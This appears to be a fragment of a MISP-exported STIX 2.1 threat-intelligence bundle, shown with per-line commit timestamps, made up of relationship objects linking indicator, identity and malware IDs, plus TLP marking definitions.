2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:22.000Z",
"modified": "2021-05-24T09:55:22.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--5cdd5ff1-ed58-46d3-bed7-4bae950d210f",
"target_ref": "x-misp-object--c3b36005-d35f-4540-bf78-cd09e2ac5e3d"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--278afdc4-b54f-4032-ad42-ae6ec3def777",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "contains",
"source_ref": "indicator--5cdd5ff1-ed58-46d3-bed7-4bae950d210f",
"target_ref": "malware--5cdd62fc-c898-42fb-ad4d-4aac950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--f02bb64f-98de-49b8-80d6-8cb8adece1b7",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "owner-of",
"source_ref": "identity--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "indicator--5cdd5b25-5624-4404-b507-c170950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--aacf8252-c017-41e9-b04d-401371530759",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "contained-within",
"source_ref": "identity--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "malware--5cdd62fc-c898-42fb-ad4d-4aac950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--54329dd6-b4f0-4a5b-aba2-487d71030419",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "targets",
"source_ref": "identity--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "x-misp-attribute--5cdd63dc-ab44-4ab7-be4b-4aa1950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--0b158655-ad51-41fc-97c9-a4f4ed93aa85",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "targets",
"source_ref": "identity--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "x-misp-attribute--5cdd63dc-0b30-404e-a1c4-4479950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--1c74b5bd-88d2-46cc-83b5-30a6496e8870",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "targets",
"source_ref": "identity--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "x-misp-attribute--5cdd63dc-0e48-4b97-bb9e-43ff950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--80ff2b4f-c28a-46e2-b2f8-5bda12b221ff",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "targets",
"source_ref": "identity--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "x-misp-attribute--5cdd63dc-713c-4eb6-adf5-4f3e950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--417112bc-55f4-48fd-b513-8eb02da31fbc",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "targets",
"source_ref": "identity--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "x-misp-attribute--5cdd63dc-b678-4fae-bd00-4390950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--f8b93184-313e-4a81-95fa-bdd35ca3a44a",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "targets",
"source_ref": "identity--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "x-misp-attribute--5cdd63dc-29ec-42c0-936b-4d9d950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--458035d0-ef31-4f17-9344-6bd8c7f28b58",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "abuses",
"source_ref": "identity--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "x-misp-attribute--5cdd683b-6530-4b0d-a8de-40c1950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--3e2416c6-eacd-49aa-85ca-7e1536e9ab30",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "targets",
"source_ref": "identity--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "x-misp-attribute--5cdd683b-6530-4b0d-a8de-40c1950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--df38c18d-288b-4f38-a75a-41cd5b6dafc4",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "owner-of",
"source_ref": "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "indicator--5cdd5b25-5624-4404-b507-c170950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--47244ea9-e1a1-4818-b73a-92839d4eff22",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "contained-within",
"source_ref": "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "malware--5cdd62fc-c898-42fb-ad4d-4aac950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--d175e336-6135-4647-b29b-f801281360b4",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "targets",
"source_ref": "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "x-misp-attribute--5cdd63dc-ab44-4ab7-be4b-4aa1950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--d355ad79-2ac5-469e-99e1-948556d77f57",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "targets",
"source_ref": "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "x-misp-attribute--5cdd63dc-0b30-404e-a1c4-4479950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--3258f81a-c783-4949-9818-8d2420910f0b",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "targets",
"source_ref": "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "x-misp-attribute--5cdd63dc-0e48-4b97-bb9e-43ff950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--541a93ee-4485-4c63-b5a9-506dec849942",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "targets",
"source_ref": "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "x-misp-attribute--5cdd63dc-713c-4eb6-adf5-4f3e950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--ebb79458-35d6-4ba4-8c6f-abf797e8d83a",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "targets",
"source_ref": "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "x-misp-attribute--5cdd63dc-b678-4fae-bd00-4390950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--8f1006c9-baa3-4c34-8910-f15fd53a3d36",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "targets",
"source_ref": "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "x-misp-attribute--5cdd63dc-29ec-42c0-936b-4d9d950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--35422291-d92b-4209-b8ae-9f15fc0d970f",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "abuses",
"source_ref": "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "x-misp-attribute--5cdd683b-6530-4b0d-a8de-40c1950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--632e5af4-77bc-4f2d-929c-11fd92709d47",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:23.000Z",
"modified": "2021-05-24T09:55:23.000Z",
"relationship_type": "targets",
"source_ref": "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f",
"target_ref": "x-misp-attribute--5cdd683b-6530-4b0d-a8de-40c1950d210f"
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:GREEN",
"definition": {
"tlp": "green"
}
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}